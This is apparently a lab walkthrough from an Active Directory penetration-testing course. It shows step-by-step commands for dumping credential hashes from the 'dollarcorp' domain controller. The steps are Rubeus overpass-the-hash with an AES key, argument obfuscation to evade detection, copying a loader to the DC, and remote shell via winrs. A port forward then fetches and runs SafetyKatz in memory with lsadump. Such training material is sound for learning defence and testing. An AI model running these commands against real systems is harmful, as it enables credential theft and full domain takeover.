Extract secrets from the domain controller of dollarcorp.
Since we have DA privs, we can extract all hashes on DC.
Let's start a process as DA from elevated cmd of student.
# Run ArgSplit for asktgt
C:\Users\student372>cd \AD\Tools
C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
set "z=t"
set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
C:\AD\Tools>set "z=t"
C:\AD\Tools>set "y=g"
C:\AD\Tools>set "x=t"
C:\AD\Tools>set "w=k"
C:\AD\Tools>set "v=s"
C:\AD\Tools>set "u=a"
C:\AD\Tools>set "Pwn=%u%%v%%w%%x%%y%%z%"
# Get DA shell as svcadmin
C:\AD\Tools>C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt
To dump hashes:
Copy Loader from student to dcorp-dc
Spawn cmd on dcorp-dc
Set up portforward to run SafetyKatz
Finally, run SafetyKatz
Note: We only get NTLM hashes using "lsadump::lsa /patch".
# Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y
# Spawn interactive shell
winrs -r:dcorp-dc cmd
# Set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72
# ArgSplit "lsadump::lsa"
# Dump hashes
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"
Let's use DCSync to dump both, NTLM and AES hashes.